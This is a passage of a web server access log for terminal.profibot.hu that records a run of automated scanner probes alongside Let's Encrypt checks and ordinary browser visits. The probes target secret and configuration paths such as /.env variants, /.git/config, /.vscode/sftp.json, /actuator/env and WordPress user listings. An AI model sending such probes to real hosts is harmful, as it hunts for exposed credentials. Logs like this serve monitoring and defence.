(l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:43 +0000] - - 301 - GET http terminal.profibot.hu "/actuator/env" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:44 +0000] - - 502 - GET https terminal.profibot.hu "/telescope/requests" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:45 +0000] - - 301 - GET http terminal.profibot.hu "/swagger-ui.html" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:45 +0000] - - 502 - GET https terminal.profibot.hu "/info.php" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:46 +0000] - - 301 - GET http terminal.profibot.hu "/swagger/index.html" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:46 +0000] - - 502 - GET https terminal.profibot.hu "/actuator/env" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:47 +0000] - - 301 - GET http terminal.profibot.hu "/swagger/swagger-ui.html" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:48 +0000] - - 301 - GET http terminal.profibot.hu "/webjars/swagger-ui/index.html" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:49 +0000] - - 502 - GET https terminal.profibot.hu "/swagger-ui.html" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:49 +0000] - - 301 - GET http terminal.profibot.hu "/swagger.json" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:50 +0000] - - 502 - GET https terminal.profibot.hu "/swagger/index.html" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:50 +0000] - - 301 - GET http terminal.profibot.hu "/swagger/v1/swagger.json" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:51 +0000] - - 502 - GET https terminal.profibot.hu "/swagger/swagger-ui.html" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:51 +0000] - - 301 - GET http terminal.profibot.hu "/v2/api-docs" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:52 +0000] - - 502 - GET https terminal.profibot.hu "/webjars/swagger-ui/index.html" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:52 +0000] - - 301 - GET http terminal.profibot.hu "/v3/api-docs" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:53 +0000] - - 502 - GET https terminal.profibot.hu "/swagger.json" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:53 +0000] - - 301 - GET http terminal.profibot.hu "/api-docs/swagger.json" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:54 +0000] - - 502 - GET https terminal.profibot.hu "/swagger/v1/swagger.json" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:54 +0000] - - 301 - GET http terminal.profibot.hu "/api/swagger.json" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:55 +0000] - - 502 - GET https terminal.profibot.hu "/v2/api-docs" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:55 +0000] - - 301 - GET http terminal.profibot.hu "/@vite/env" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:56 +0000] - - 502 - GET https terminal.profibot.hu "/v3/api-docs" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:56 +0000] - - 301 - GET http terminal.profibot.hu "/.vscode/sftp.json" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:57 +0000] - - 502 - GET https terminal.profibot.hu "/api-docs/swagger.json" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:57 +0000] - - 301 - GET http terminal.profibot.hu "/?rest_route=/wp/v2/users/" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:58 +0000] - - 502 - GET https terminal.profibot.hu "/api/swagger.json" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:58 +0000] - - 301 - GET http terminal.profibot.hu "/debug/default/view?panel=config" [Client 146.190.103.103] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:22:59 +0000] - - 502 - GET https terminal.profibot.hu "/@vite/env" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:23:00 +0000] - - 502 - GET https terminal.profibot.hu "/.vscode/sftp.json" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:23:01 +0000] - - 502 - GET https terminal.profibot.hu "/?rest_route=/wp/v2/users/" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:23:02 +0000] - - 502 - GET https terminal.profibot.hu "/debug/default/view?panel=config" [Client 68.183.180.73] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (l9scan/2.0.139313e2531323e22383e21393; +https://leakix.net)" "-" +[27/Jan/2026:23:23:37 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 162.43.226.16] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" +[27/Jan/2026:23:23:37 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 104.232.199.4] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "-" +[27/Jan/2026:23:23:37 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 162.43.226.16] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "https://terminal.profibot.hu/" +[27/Jan/2026:23:23:37 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:23:37 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:23:37 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 104.232.199.4] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.151 Mobile/15E148 Safari/604.1" "https://terminal.profibot.hu/" +[27/Jan/2026:23:23:37 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:23:37 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:24:14 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:24:14 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:24:14 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:24:14 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:24:15 +0000] - - 502 - GET https terminal.profibot.hu "/.git/config" [Client 194.163.149.48] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[27/Jan/2026:23:24:56 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 37.76.47.171] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[27/Jan/2026:23:24:56 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 37.76.47.171] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://terminal.profibot.hu/" +[27/Jan/2026:23:24:58 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 66.249.81.193] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[27/Jan/2026:23:24:58 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 66.102.9.135] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[27/Jan/2026:23:24:58 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 66.102.9.129] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[27/Jan/2026:23:25:08 +0000] - - 301 - HEAD http terminal.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:25:09 +0000] - - 502 - HEAD https terminal.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu" +[27/Jan/2026:23:25:09 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 176.65.148.161] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:25:09 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 176.65.148.161] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu" +[27/Jan/2026:23:25:10 +0000] - - 301 - HEAD http terminal.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:25:10 +0000] - - 502 - HEAD https terminal.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu/_next" +[27/Jan/2026:23:25:10 +0000] - - 301 - HEAD http terminal.profibot.hu "/__rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:25:10 +0000] - - 502 - HEAD https terminal.profibot.hu "/__rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu/__rsc" +[27/Jan/2026:23:25:10 +0000] - - 301 - HEAD http terminal.profibot.hu "/rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:25:10 +0000] - - 301 - HEAD http terminal.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:25:10 +0000] - - 502 - HEAD https terminal.profibot.hu "/rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu/rsc" +[27/Jan/2026:23:25:12 +0000] - - 502 - HEAD https terminal.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu" +[27/Jan/2026:23:25:12 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 176.65.148.161] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:25:12 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 176.65.148.161] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu" +[27/Jan/2026:23:25:12 +0000] - - 301 - HEAD http terminal.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:25:13 +0000] - - 502 - HEAD https terminal.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu/_next" +[27/Jan/2026:23:25:13 +0000] - - 301 - HEAD http terminal.profibot.hu "/__rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:25:13 +0000] - - 502 - HEAD https terminal.profibot.hu "/__rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu/__rsc" +[27/Jan/2026:23:25:13 +0000] - - 301 - HEAD http terminal.profibot.hu "/rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:25:13 +0000] - - 502 - HEAD https terminal.profibot.hu "/rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu/rsc" +[27/Jan/2026:23:25:20 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:25:20 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.local" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:25:20 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.prod" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:25:20 +0000] - - 502 - HEAD https terminal.profibot.hu "/.env.dev" [Client 104.244.74.39] [Length 0] [Gzip -] [Sent-to web-terminal] "Python/3.13 aiohttp/3.11.18" "-" +[27/Jan/2026:23:26:16 +0000] - - 301 - HEAD http terminal.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:26:16 +0000] - - 502 - HEAD https terminal.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu" +[27/Jan/2026:23:26:17 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 176.65.148.161] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:26:17 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 176.65.148.161] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu" +[27/Jan/2026:23:26:17 +0000] - - 301 - HEAD http terminal.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:26:17 +0000] - - 502 - HEAD https terminal.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu/_next" +[27/Jan/2026:23:26:18 +0000] - - 301 - HEAD http terminal.profibot.hu "/__rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:26:18 +0000] - - 502 - HEAD https terminal.profibot.hu "/__rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu/__rsc" +[27/Jan/2026:23:26:18 +0000] - - 301 - HEAD http terminal.profibot.hu "/rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:26:18 +0000] - - 502 - HEAD https terminal.profibot.hu "/rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu/rsc" +[27/Jan/2026:23:26:38 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 37.76.47.171] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[27/Jan/2026:23:26:38 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 37.76.47.171] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://terminal.profibot.hu/" +[27/Jan/2026:23:26:39 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 37.76.47.171] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[27/Jan/2026:23:26:40 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 37.76.47.171] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://terminal.profibot.hu/" +[27/Jan/2026:23:28:00 +0000] - - 301 - HEAD http terminal.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:28:01 +0000] - - 502 - HEAD https terminal.profibot.hu "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu" +[27/Jan/2026:23:28:01 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 176.65.148.161] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:28:01 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 176.65.148.161] [Length 154] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu" +[27/Jan/2026:23:28:02 +0000] - - 301 - HEAD http terminal.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:28:02 +0000] - - 502 - HEAD https terminal.profibot.hu "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu/_next" +[27/Jan/2026:23:28:02 +0000] - - 301 - HEAD http terminal.profibot.hu "/__rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:28:03 +0000] - - 502 - HEAD https terminal.profibot.hu "/__rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu/__rsc" +[27/Jan/2026:23:28:03 +0000] - - 301 - HEAD http terminal.profibot.hu "/rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-" +[27/Jan/2026:23:28:03 +0000] - - 502 - HEAD https terminal.profibot.hu "/rsc" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "http://terminal.profibot.hu/rsc" +[27/Jan/2026:23:30:01 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 37.76.47.171] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[27/Jan/2026:23:30:01 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 37.76.47.171] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://terminal.profibot.hu/" +[27/Jan/2026:23:30:03 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 37.76.47.171] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[27/Jan/2026:23:30:03 +0000] - - 502 - GET https terminal.profibot.hu "/favicon.ico" [Client 37.76.47.171] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://terminal.profibot.hu/" +[27/Jan/2026:23:35:52 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 64.15.129.125] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[27/Jan/2026:23:35:53 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 192.175.111.253] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://terminal.profibot.hu/" +[27/Jan/2026:23:35:54 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 192.175.111.238] [Length 166] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[27/Jan/2026:23:35:54 +0000] - - 502 - GET https terminal.profibot.hu "/" [Client 64.15.129.116] [Length 556] [Gzip -] [Sent-to web-terminal] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "http://terminal.profibot.hu/" +[27/Jan/2026:23:35:55 +0000] - - 301 - GET http terminal.profibot.hu "/" [Client 64.15.129.125] [Length 166] [Gzip -] [Sent-to 